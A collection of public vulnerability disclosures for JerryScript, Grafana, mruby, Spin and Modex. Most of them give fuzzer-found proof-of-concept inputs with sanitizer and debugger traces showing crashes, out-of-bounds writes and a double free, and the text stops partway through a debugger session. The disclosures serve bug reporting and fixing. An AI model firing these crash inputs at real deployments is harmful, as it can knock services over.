There is an Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at /jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set):421 in JerryScript 3.0.0.

**JerryScript revision**

Commit: a6ab5e9

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**poc.js

    
    var date;
    
    date = new Date(1970, 0);
    date.setYear((date.getFullYear(), 1900, 'y = -0'));
    date.setYear(-0);
    
    date.setYear(-0);
    date.setYear(-0);
    assert.sameValue(date.getFullYear(), 1900, 'y = -0');
    
    date = new Date(1970, 0);
    date.setYear(0);
    assert.sameValue(date.getFullYear(), 1900, 'y = 0');
    
    date = new Date(1970, 0);
    date.setYear(50);
    assert.sameValue(date.getFullYear(), 1950, 'y = 50');
    
    date = new Date(1970, 0);
    date.setYear(50.999999);
    assert.sameValue(date.getFullYear(), 1950, 'y = 50.999999');
    
    date = new Date(1970, 0);
    date.setYear(99);
    assert.sameValue(date.getFullYear(), 1999, 'y = 99');
    
    date = new Date(1970, 0);
    date.setYear(99.999999);
    assert.sameValue(date.getFullYear(), 1999, 'y = 99.999999');
​**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'local\_tza == ecma\_date\_local\_time\_zone\_adjustment (date\_value)' failed at jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma\_builtin\_date\_prototype\_dispatch\_set):421.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION
\[1\]    309 abort      jerry poc.js

Credits: Found by OWL337 team.

CVE-2021-46346: Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set)

Grafana is an open-source platform for monitoring and observability. In affected versions when a data source has the Forward OAuth Identity feature enabled, sending a query to that datasource with an API token (and no other user credentials) will forward the OAuth Identity of the most recently logged-in user. This can allow API token holders to retrieve data for which they may not have intended access. This attack relies on the Grafana instance having data sources that support the Forward OAuth Identity feature, the Grafana instance having a data source with the Forward OAuth Identity feature toggled on, the Grafana instance having OAuth enabled, and the Grafana instance having usable API keys. This issue has been patched in versions 7.5.13 and 8.3.4.

When a data source has the Forward OAuth Identity feature enabled, sending a query to that datasource with an API token (and no other user credentials) will forward the OAuth Identity of the most recently logged-in user.

This can allow API token holders to retrieve data for which they may not have intended access.

**Impact**

All of the following must be true:

*   The Grafana instance has data sources that support the Forward OAuth Identity feature. Graphite users, for example.
    *   Some data sources are not susceptible, like Prometheus, as they do not have support for this feature.
    *   The option being available is not sufficient enough to determine if the data source is susceptible.
*   The Grafana instance has a data source with the Forward OAuth Identity feature toggled on.
*   The Grafana instance has OAuth enabled.
*   The Grafana instance has usable API keys.

**Patches**

The following Grafana versions have been patched:

*   v8.3.4
*   v7.5.13

**Workarounds**

Administrators of Grafana instances can limit the availability of API tokens.

**Reporting security issues**

If you think you have found a security vulnerability, please send a report to security@grafana.com. This address can be used for all of Grafana Labs' open source and commercial products (including, but not limited to Grafana, Grafana Cloud, Grafana Enterprise, and grafana.com). We can accept only vulnerability reports at this address. We would prefer that you encrypt your message to us by using our PGP key. The key fingerprint is

F988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA

The key is available from keyserver.ubuntu.com.

**Security announcements**

We maintain a security category on our blog, where we will always post a summary, remediation, and mitigation details for any patch containing security fixes.

You can also subscribe to our RSS feed.

CVE-2022-21673: Forward OAuth Identity Token can allow users to access some data sources

**Package**

Forward OAuth Identity / OAuth Passthrough (Grafana)

**Affected versions**

\> 7.2.0

When a data source has the Forward OAuth Identity feature enabled, sending a query to that datasource with an API token (and no other user credentials) will forward the OAuth Identity of the most recently logged-in user.

This can allow API token holders to retrieve data for which they may not have intended access.

**Impact**

All of the following must be true:

*   The Grafana instance has data sources that support the Forward OAuth Identity feature. Graphite users, for example.
    *   Some data sources are not susceptible, like Prometheus, as they do not have support for this feature.
    *   The option being available is not sufficient enough to determine if the data source is susceptible.
*   The Grafana instance has a data source with the Forward OAuth Identity feature toggled on.
*   The Grafana instance has OAuth enabled.
*   The Grafana instance has usable API keys.

**Patches**

The following Grafana versions have been patched:

*   `v8.3.4`
*   `v7.5.13`

**Workarounds**

Administrators of Grafana instances can limit the availability of API tokens.

**Reporting security issues**

If you think you have found a security vulnerability, please send a report to security@grafana.com. This address can be used for all of Grafana Labs' open source and commercial products (including, but not limited to Grafana, Grafana Cloud, Grafana Enterprise, and grafana.com). We can accept only vulnerability reports at this address. We would prefer that you encrypt your message to us by using our PGP key. The key fingerprint is

F988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA

The key is available from keyserver.ubuntu.com.

**Security announcements**

We maintain a security category on our blog, where we will always post a summary, remediation, and mitigation details for any patch containing security fixes.

You can also subscribe to our RSS feed.

**CVSS Score**

4.3 Moderate

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVE-2022-21673: Build software better, together

mruby is vulnerable to NULL Pointer Dereference

**Description**

There is a NULL Pointer Dereference in `prepare_singleton_class` (`src/class.c:360:13`). This bug has been found on mruby lastest commit (hash `171d32c0071d776207174a40a8fa26def3dbb931`) on Ubuntu 20.04 for x86\_64/amd64.

**Proof of Concept**

    1.times{b={}
    a=0
    [**0,m:0]
    c={0=>0,nil=>nil}[0]
    def m()end
    def c.e()end}
    

**Steps to reproduce**

1- Clone repo and build with ASAN using `MRUBY_CONFIG=build_config/clang-asan.rb rake`

2- Use mruby to execute the poc:

    $ echo -ne "MS50aW1lc3tiPXt9CmE9MApbKiowLG06MF0KYz17MD0+MCxuaWw9Pm5pbH1bMF0KZGVmIG0oKWVuZApkZWYgYy5lKCllbmR9Cg==" | base64 -d > poc
    $ build/host/bin/mruby ./poc
    /home/octa/mruby/src/class.c:360:13: runtime error: member access within null pointer of type 'struct RClass'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/octa/mruby/src/class.c:360:13 in 
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==31695==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000005270f8 bp 0x7ffec6a14090 sp 0x7ffec6a13d80 T0)
    ==31695==The signal is caused by a READ memory access.
    ==31695==Hint: address points to the zero page.
        #0 0x5270f8 in prepare_singleton_class /home/octa/mruby/src/class.c:360:13
        #1 0x52688f in mrb_singleton_class_ptr /home/octa/mruby/src/class.c:1685:3
        #2 0x528785 in mrb_singleton_class /home/octa/mruby/src/class.c:1692:22
        #3 0x600757 in mrb_vm_exec /home/octa/mruby/src/vm.c:2918:17
        #4 0x566ee9 in mrb_vm_run /home/octa/mruby/src/vm.c:1128:12
        #5 0x55c339 in mrb_top_run /home/octa/mruby/src/vm.c:3050:12
        #6 0x88b6ce in mrb_load_exec /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6882:7
        #7 0x88d2dc in mrb_load_detect_file_cxt /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6925:12
        #8 0x4c9118 in main /home/octa/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347:11
        #9 0x7f46ef9450b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #10 0x41d82d in _start (/home/octa/mruby/build/host/bin/mruby+0x41d82d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/octa/mruby/src/class.c:360:13 in prepare_singleton_class
    ==31695==ABORTING
    

**Acknowledgements**

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

CVE-2022-0240: NULL Pointer Dereference in mruby

Spin v6.5.1 was discovered to contain an out-of-bounds write in lex() at spinlex.c.

**Out-of-bounds Write in lex()****Description**

Out-of-bounds Write in lex() at spinlex.c:1707

If there are 129 `{`，the `yyin` will add 1

int	scope\_seq\[128\], scope\_level = 0;
//...
case '{': scope\_seq\[scope\_level++\]++; set\_cur\_scope(); break;

then, the `fclose(yyin)` at main:1162 will crash.

If there are more `}` than `{`, the `scope_level` will be negative.

    case '}': scope_level--; set_cur_scope(); break;
    

then, the variables before `scope_seq` will add 1.

Should there be a limit?

**version**

045a0a5

    ./spin -V
    Spin Version 6.5.1 -- 3 June 2021
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**poc**

{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{

**command**

**Result**

    spin ./poc.pml
    spin: ./poc.pml:1, Error: syntax error  saw ''{' = 123'
    [1]    3640076 segmentation fault  ./spin ./poc.pml
    

**gdb**

pwndbg> c
Continuing.
\[Detaching after vfork from child process 3024771\]

Hardware watchpoint 2: yyin

Old value = (FILE \*) 0x7ffff7fab980 <\_IO\_2\_1\_stdin\_>
New value = (FILE \*) 0x5555556d32a0
0x00005555555ce524 in main (argc=2, argv=0x7fffffffe188) at main.c:1106
1106                    if (!(yyin = fopen(out1, "r")))
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────
\*RAX  0x5555556d32a0 ◂— 0xfbad2488
 RBX  0x5555556111f0 (\_\_libc\_csu\_init) ◂— endbr64
\*RCX  0x1e
\*RDX  0x0
\*RDI  0x555555618c9e ◂— 0x63203a6e69707300
\*RSI  0x2c
\*R8   0x8
\*R9   0x1
\*R10  0x0
\*R11  0x246
 R12  0x5555555bc660 (\_start) ◂— endbr64
 R13  0x7fffffffe180 ◂— 0x2
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe090 ◂— 0x0
 RSP  0x7fffffffdc30 —▸ 0x7fffffffe188 —▸ 0x7fffffffe47d ◂— '/home/aidai/fuzzing/model\_checking/Spin-test/Src/spin'
\*RIP  0x5555555ce524 (main+3399) ◂— mov    rax, qword ptr \[rip + 0xfd135\]
──────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────
 ► 0x5555555ce524 <main+3399>    mov    rax, qword ptr \[rip + 0xfd135\] <0x5555556cb660>
   0x5555555ce52b <main+3406>    test   rax, rax
   0x5555555ce52e <main+3409>    jne    main+3445                <main+3445>
    ↓
   0x5555555ce552 <main+3445>    mov    rax, qword ptr \[rbp - 0x460\]
   0x5555555ce559 <main+3452>    add    rax, 8
   0x5555555ce55d <main+3456>    mov    rax, qword ptr \[rax\]
   0x5555555ce560 <main+3459>    mov    rdi, rax
   0x5555555ce563 <main+3462>    call   strlen@plt                <strlen@plt>

   0x5555555ce568 <main+3467>    add    rax, 1
   0x5555555ce56c <main+3471>    cmp    rax, 0x1ff
   0x5555555ce572 <main+3477>    jbe    main+3510                <main+3510>
──────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────
In file: /home/aidai/fuzzing/model\_checking/Spin-test/Src/main.c
   1101
   1102                 if (preprocessonly)
   1103                 {       alldone(0);
   1104                 }
   1105
 ► 1106                 if (!(yyin = fopen(out1, "r")))
   1107                 {       printf("spin: cannot open %s\\n", out1);
   1108                         alldone(1);
   1109                 }
   1110
   1111                 assert(strlen(argv\[1\])+1 < sizeof(cmd));
──────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdc30 —▸ 0x7fffffffe188 —▸ 0x7fffffffe47d ◂— '/home/aidai/fuzzing/model\_checking/Spin-test/Src/spin'
01:0008│     0x7fffffffdc38 ◂— 0x2f7fdb1e9
02:0010│     0x7fffffffdc40 ◂— 0x1
03:0018│     0x7fffffffdc48 ◂— 0x61d1ad40f7fb2a08
04:0020│     0x7fffffffdc50 ◂— 0x0
05:0028│     0x7fffffffdc58 ◂— 0x0
06:0030│     0x7fffffffdc60 —▸ 0x7ffff7fac6a0 (\_IO\_2\_1\_stdout\_) ◂— 0xfbad2084
07:0038│     0x7fffffffdc68 —▸ 0x7ffff7ffd9e8 (\_rtld\_global+2440) —▸ 0x7ffff7fcf000 ◂— 0x10102464c457f
────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────
 ► f 0   0x5555555ce524 main+3399
   f 1   0x7ffff7de70b3 \_\_libc\_start\_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p yyin
$9 = (FILE \*) 0x5555556d32a0
pwndbg> c
Continuing.
spin: ./poc.pml:1, Error: syntax error  saw ''{' = 123'

Hardware watchpoint 2: yyin

Old value = (FILE \*) 0x5555556d32a0
New value = (FILE \*) 0x5555556d32a1
lex () at spinlex.c:1707
1707            case '{': scope\_seq\[scope\_level++\]++; set\_cur\_scope(); break;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────
\*RAX  0x5555556cb460 (scope\_seq) ◂— 0x100000001
 RBX  0x5555556111f0 (\_\_libc\_csu\_init) ◂— endbr64
\*RCX  0x556d32a1
\*RDX  0x200
\*RDI  0x7b
\*RSI  0x6e
\*R8   0x7b
\*R9   0x3
\*R10  0x555555619116 ◂— 0x5c00745c00625c00
\*R11  0x7ffff7fabbe0 (main\_arena+96) —▸ 0x5555556d7aa0 ◂— 0x0
 R12  0x5555555bc660 (\_start) ◂— endbr64
 R13  0x7fffffffe180 ◂— 0x2
 R14  0x0
 R15  0x0
\*RBP  0x7fffffffd300 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 —▸ 0x7fffffffe090 ◂— 0x0
\*RSP  0x7fffffffd140 ◂— 0x3000000018
\*RIP  0x5555555c6b08 (lex+3177) ◂— call   0x5555555c5954
──────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────
 ► 0x5555555c6b08 <lex+3177\>    call   set\_cur\_scope                <set\_cur\_scope>

   0x5555555c6b0d <lex+3182\>    jmp    lex+3213                <lex+3213\>

   0x5555555c6b0f <lex+3184\>    mov    eax, dword ptr \[rip + 0xe13cf\] <0x5555556a7ee4\>
   0x5555555c6b15 <lex+3190\>    sub    eax, 1
   0x5555555c6b18 <lex+3193\>    mov    dword ptr \[rip + 0xe13c6\], eax <0x5555556a7ee4\>
   0x5555555c6b1e <lex+3199\>    call   set\_cur\_scope                <set\_cur\_scope>

   0x5555555c6b23 <lex+3204\>    jmp    lex+3213                <lex+3213\>

   0x5555555c6b25 <lex+3206\>    nop
   0x5555555c6b26 <lex+3207\>    jmp    lex+3213                <lex+3213\>

   0x5555555c6b28 <lex+3209\>    nop
   0x5555555c6b29 <lex+3210\>    jmp    lex+3213                <lex+3213\>
──────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────
In file: /home/aidai/fuzzing/model\_checking/Spin-test/Src/spinlex.c
   1702         case '?': c = follow('?', R\_RCV, RCV); break;
   1703         case '&': c = follow('&', AND, '&'); break;
   1704         case '|': c = follow('|', OR, '|'); break;
   1705         case ';': c = SEMI; break;
   1706         case '.': c = follow('.', DOTDOT, '.'); break;
 ► 1707         case '{': scope\_seq\[scope\_level++\]++; set\_cur\_scope(); break;
   1708         case '}': scope\_level--; set\_cur\_scope(); break;
   1709         default : break;
   1710         }
   1711         ValToken(0, c)
   1712 }
──────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd140 ◂— 0x3000000018
01:0008│     0x7fffffffd148 ◂— 0x7bffffd220
02:0010│     0x7fffffffd150 —▸ 0x7fffffffd160 —▸ 0x7fffffffd260 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 ◂— ...
03:0018│     0x7fffffffd158 ◂— 0x3f55a706937ce400
04:0020│     0x7fffffffd160 —▸ 0x7fffffffd260 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 —▸ 0x7fffffffe090 ◂— ...
05:0028│     0x7fffffffd168 —▸ 0x7ffff7e24ebf (printf+175) ◂— mov    rcx, qword ptr \[rsp + 0x18\]
06:0030│     0x7fffffffd170 ◂— 0x7b /\* '{' \*/
07:0038│     0x7fffffffd178 ◂— 0x0
────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────
 ► f 0   0x5555555c6b08 lex+3177
   f 1   0x5555555c7235 yylex+61
   f 2   0x5555555bca8d yyparse+796
   f 3   0x5555555ce8d8 main+4347
   f 4   0x7ffff7de70b3 \_\_libc\_start\_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/70gx scope\_seq
0x5555556cb460 <scope\_seq>:     0x0000000100000001      0x0000000100000001
0x5555556cb470 <scope\_seq+16\>:  0x0000000100000001      0x0000000100000001
0x5555556cb480 <scope\_seq+32\>:  0x0000000100000001      0x0000000100000001
0x5555556cb490 <scope\_seq+48\>:  0x0000000100000001      0x0000000100000001
0x5555556cb4a0 <scope\_seq+64\>:  0x0000000100000001      0x0000000100000001
0x5555556cb4b0 <scope\_seq+80\>:  0x0000000100000001      0x0000000100000001
0x5555556cb4c0 <scope\_seq+96\>:  0x0000000100000001      0x0000000100000001
0x5555556cb4d0 <scope\_seq+112\>: 0x0000000100000001      0x0000000100000001
0x5555556cb4e0 <scope\_seq+128\>: 0x0000000100000001      0x0000000100000001
0x5555556cb4f0 <scope\_seq+144\>: 0x0000000100000001      0x0000000100000001
0x5555556cb500 <scope\_seq+160\>: 0x0000000100000001      0x0000000100000001
0x5555556cb510 <scope\_seq+176\>: 0x0000000100000001      0x0000000100000001
0x5555556cb520 <scope\_seq+192\>: 0x0000000100000001      0x0000000100000001
0x5555556cb530 <scope\_seq+208\>: 0x0000000100000001      0x0000000100000001
0x5555556cb540 <scope\_seq+224\>: 0x0000000100000001      0x0000000100000001
0x5555556cb550 <scope\_seq+240\>: 0x0000000100000001      0x0000000100000001
0x5555556cb560 <scope\_seq+256\>: 0x0000000100000001      0x0000000100000001
0x5555556cb570 <scope\_seq+272\>: 0x0000000100000001      0x0000000100000001
0x5555556cb580 <scope\_seq+288\>: 0x0000000100000001      0x0000000100000001
0x5555556cb590 <scope\_seq+304\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5a0 <scope\_seq+320\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5b0 <scope\_seq+336\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5c0 <scope\_seq+352\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5d0 <scope\_seq+368\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5e0 <scope\_seq+384\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5f0 <scope\_seq+400\>: 0x0000000100000001      0x0000000100000001
0x5555556cb600 <scope\_seq+416\>: 0x0000000100000001      0x0000000100000001
0x5555556cb610 <scope\_seq+432\>: 0x0000000100000001      0x0000000100000001
0x5555556cb620 <scope\_seq+448\>: 0x0000000100000001      0x0000000100000001
0x5555556cb630 <scope\_seq+464\>: 0x0000000100000001      0x0000000100000001
0x5555556cb640 <scope\_seq+480\>: 0x0000000100000001      0x0000000100000001
0x5555556cb650 <scope\_seq+496\>: 0x0000000100000001      0x0000000100000001
0x5555556cb660 <yyin>:  0x00005555556d32a1      0x0000000000000000
0x5555556cb670: 0x0000000000000000      0x0000000000000000
0x5555556cb680 <yytext>:        0x6d702e636f70007b      0x64003e656e69006c

**poc**

**command**

**Result**

    ./model_checking/Spin/Src/spin ./poc.pml
    spin: ./poc.pml:1, Error: syntax error  saw ''{' = 123'
    0 processes created
    

**gdb**

pwndbg> c
Continuing.

Breakpoint 4, lex () at spinlex.c:1707
1707            case '{': scope\_seq\[scope\_level++\]++; set\_cur\_scope(); break;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────
 RAX  0x5555555c6acd (lex+3118) ◂— mov    eax, dword ptr \[rip + 0xe1411\]
 RBX  0x5555556111f0 (\_\_libc\_csu\_init) ◂— endbr64
\*RCX  0x5555556d5520 ◂— 0x0
 RDX  0x555555616628 ◂— 0xfffb04fdfffb03f0
 RDI  0x7b
\*RSI  0x6e
 R8   0x7b
 R9   0x3
 R10  0x555555619116 ◂— 0x5c00745c00625c00
 R11  0x7ffff7fabbe0 (main\_arena+96) —▸ 0x5555556d5520 ◂— 0x0
 R12  0x5555555bc660 (\_start) ◂— endbr64
 R13  0x7fffffffe180 ◂— 0x2
 R14  0x0
 R15  0x0
 RBP  0x7fffffffd300 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 —▸ 0x7fffffffe090 ◂— 0x0
 RSP  0x7fffffffd140 ◂— 0x3000000018
 RIP  0x5555555c6acd (lex+3118) ◂— mov    eax, dword ptr \[rip + 0xe1411\]
──────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────
 ► 0x5555555c6acd <lex+3118\>    mov    eax, dword ptr \[rip + 0xe1411\] <0x5555556a7ee4\>
   0x5555555c6ad3 <lex+3124\>    lea    edx, \[rax + 1\]
   0x5555555c6ad6 <lex+3127\>    mov    dword ptr \[rip + 0xe1408\], edx <0x5555556a7ee4\>
   0x5555555c6adc <lex+3133\>    movsxd rdx, eax
   0x5555555c6adf <lex+3136\>    lea    rcx, \[rdx\*4\]
   0x5555555c6ae7 <lex+3144\>    lea    rdx, \[rip + 0x104972\]         <0x5555556cb460\>
   0x5555555c6aee <lex+3151\>    mov    edx, dword ptr \[rcx + rdx\]
   0x5555555c6af1 <lex+3154\>    lea    ecx, \[rdx + 1\]
   0x5555555c6af4 <lex+3157\>    cdqe
   0x5555555c6af6 <lex+3159\>    lea    rdx, \[rax\*4\]
   0x5555555c6afe <lex+3167\>    lea    rax, \[rip + 0x10495b\]         <0x5555556cb460\>
──────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────
In file: /home/aidai/fuzzing/model\_checking/Spin-test/Src/spinlex.c
   1702         case '?': c = follow('?', R\_RCV, RCV); break;
   1703         case '&': c = follow('&', AND, '&'); break;
   1704         case '|': c = follow('|', OR, '|'); break;
   1705         case ';': c = SEMI; break;
   1706         case '.': c = follow('.', DOTDOT, '.'); break;
 ► 1707         case '{': scope\_seq\[scope\_level++\]++; set\_cur\_scope(); break;
   1708         case '}': scope\_level--; set\_cur\_scope(); break;
   1709         default : break;
   1710         }
   1711         ValToken(0, c)
   1712 }
──────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd140 ◂— 0x3000000018
01:0008│     0x7fffffffd148 ◂— 0x7bffffd220
02:0010│     0x7fffffffd150 —▸ 0x7fffffffd160 —▸ 0x7fffffffd260 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 ◂— ...
03:0018│     0x7fffffffd158 ◂— 0x6e01a8e24c007700
04:0020│     0x7fffffffd160 —▸ 0x7fffffffd260 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 —▸ 0x7fffffffe090 ◂— ...
05:0028│     0x7fffffffd168 —▸ 0x7ffff7e24ebf (printf+175) ◂— mov    rcx, qword ptr \[rsp + 0x18\]
06:0030│     0x7fffffffd170 ◂— 0x7b /\* '{' \*/
07:0038│     0x7fffffffd178 ◂— 0x0
────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────
 ► f 0   0x5555555c6acd lex+3118
   f 1   0x5555555c7235 yylex+61
   f 2   0x5555555bca8d yyparse+796
   f 3   0x5555555ce8d8 main+4347
   f 4   0x7ffff7de70b3 \_\_libc\_start\_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p scope\_level
$15 = -2
pwndbg> x/10gx scope\_seq
0x5555556cb460 <scope\_seq>:     0x0000000100000001      0x0000000000000000
0x5555556cb470 <scope\_seq+16\>:  0x0000000000000000      0x0000000000000000
0x5555556cb480 <scope\_seq+32\>:  0x0000000000000000      0x0000000000000000
0x5555556cb490 <scope\_seq+48\>:  0x0000000000000000      0x0000000000000000
0x5555556cb4a0 <scope\_seq+64\>:  0x0000000000000000      0x0000000000000000
pwndbg> x/10gx scope\_seq-0x10
0x5555556cb420 <can>:   0x0000000000000000      0x0000000000000000
0x5555556cb430 <Caches>:        0x0000000000000000      0x0000000000000000
0x5555556cb440 <yynerrs>:       0xfffffffe00000001      0x00005555556d54e0
0x5555556cb450: 0x0000000100000000      0x0000000000000000
0x5555556cb460 <scope\_seq>:     0x0000000100000001      0x0000000000000000
pwndbg>

CVE-2021-46168: Out-of-bounds Write in lex() · Issue #56 · nimble-code/Spin

Modex v2.11 was discovered to contain an Use-After-Free vulnerability via the component tcache.

**Use After Free****Description**

I am learning model checking. But I run a fuzzer for fun today.

My fuzzer has found a Use After Free in modex.

The chunk 0x5555555b96b0 was freed.Then the tcache key was covered and the chunk was freed again.

**version**

acfa291

    modex -V
    MODEX Version 2.11 - 3 November 2017
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**poc**

base64 poc
dHlwZWRlZiBzdHJ1Y3QgRW50cnkgRW50cnk7CgpzdHJ1Y3QgRW50cnkgewp9CglFbnRyeSBoZWFk
OwoJZm9yICh2YWwgPSAwOyB2YWwgPCAycmV0dXJuOyB2YWwrKyl9Cgp2b2lkICoKcnRsX2dldCh2
b2lkICphcmcpCnsJNG50cnkgKnE7CgkJbmV4dCA9IHEtPm5leHQ7CmlmIDsxPT0wKQoJCWUgPSBu
ZXh0LT5uZXh0O3ggPSBjewoJCW5leHQgPSBxLT5uZXh0OwoJCWlmICgoeCA9PSAwKTsKCglpZiAo
cS0+bmV4dGVtcCBuaWwgJiYgZSA9PSAwKQoJewl4ID0gY2FzKCZxLT50YWlsLCBuZXh0LCBxKTsK
CQlpZih4ID09IDApCgkJewljYXMoJm5leHQtPm5leHQsIG5pbCwgbmV4dC0+dMptcCk7CgkJCS0+
bmV4YXNzZXJ0KG5leHQ8PnZhbHVlID2AAAAAIHZhbDEgKyAxIHx8IG5leHQtPnZhbHVlID09IHZh
bDIgKyAxcnkgaGVhZDsKRW50cnkgKm5pbCA9O3ByZXYtPnRlbXAgPSBuZXc7CgkJZGVjdmFsMSAr
IDEpCgkJdmFsMSsrOwp9CgppbnQKbWFpbih2b2lkKQp9CglyZXR1cm4gMDsKfQo=

**command**

**Result**

    modex poc.c
    MODEX Version 2.11 - 3 November 2017
    poc.c:4: Error (syntax error, unexpected RBRACE) before '}'
    }
    ^
    poc.c:6: Error (syntax error, unexpected FOR) before 'for'
     for (val = 0; val < 2return; val++)}
     ^
    poc.c:10: Error (syntax error, unexpected IDENT, expecting SEMICOLON) before 'Identifier'
    { 4ntry *q;
       ^
    poc.c:12: Error (syntax error, unexpected SEMICOLON, expecting LPAREN) before ';'
    if ;1==0)
       ^
    poc.c:12: Error (syntax error, unexpected RPAREN, expecting SEMICOLON) before ')'
    if ;1==0)
            ^
    poc.c:13: Error (syntax error, unexpected LBRACE, expecting SEMICOLON) before '{'
      e = next->next;x = c{
                          ^
    poc.c:15: Error (syntax error, unexpected SEMICOLON, expecting RPAREN) before ';'
      if ((x == 0);
                  ^
    poc.c:17: Error (syntax error, unexpected IDENT, expecting RPAREN) before 'Identifier'
     if (q->nextemp nil && e == 0)
                    ^
    poc.c:20: Error (syntax error, unexpected RPAREN, expecting SEMICOLON) before ')'
      decval1 + 1)
                 ^
    poc.c:26: Error (syntax error, unexpected RBRACE, expecting LBRACE) before '}'
    }
    ^
    too many errors (10 detected)
    10 errors
    free(): double free detected in tcache 2
    [1]    3645907 abort      modex poc.c
    

**gdb**

`watch *0x5555555b96b0`

`c 34`

`n`

pwndbg>
0x00007ffff7cf603e      863     in libioP.h
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────\[ REGISTERS \]──────────────────────────────────────
 RAX  0xffffff00
 RBX  0x7ffff7e5e4a0 (\_IO\_file\_jumps) ◂— 0x0
 RCX  0xffffffffffffffb0
 RDX  0x1c500
\*RDI  0x5555555b96b0 —▸ 0x5555555ba020 ◂— 0x0
 RSI  0x0
 R8   0x8000
 R9   0xa
 R10  0x5555555988f6 ◂— ' errors\\n'
 R11  0x246
 R12  0xffffffff
 R13  0x7fffffffe180 ◂— 0x2
 R14  0x0
 R15  0x0
 RBP  0x5555555b96b0 —▸ 0x5555555ba020 ◂— 0x0
 RSP  0x7fffffffdc90 —▸ 0x55555558c130 (\_\_libc\_csu\_init) ◂— endbr64
\*RIP  0x7ffff7cf603e (fclose+238) ◂— call   0x7ffff7c96330
───────────────────────────────────────\[ DISASM \]────────────────────────────────────────
   0x7ffff7cf602e <fclose+222\>    or     dl, al
   0x7ffff7cf6030 <fclose+224\>    jne    fclose+243                <fclose+243\>

   0x7ffff7cf6032 <fclose+226\>    cmp    rbp, qword ptr \[rip + 0x165e57\]
   0x7ffff7cf6039 <fclose+233\>    je     fclose+243                <fclose+243\>

   0x7ffff7cf603b <fclose+235\>    mov    rdi, rbp
 ► 0x7ffff7cf603e <fclose+238\>    call   free@plt                <free@plt>
        ptr: 0x5555555b96b0 —▸ 0x5555555ba020 ◂— 0x0

   0x7ffff7cf6043 <fclose+243\>    mov    eax, r12d
   0x7ffff7cf6046 <fclose+246\>    pop    rbx
   0x7ffff7cf6047 <fclose+247\>    pop    rbp
   0x7ffff7cf6048 <fclose+248\>    pop    r12
   0x7ffff7cf604a <fclose+250\>    ret
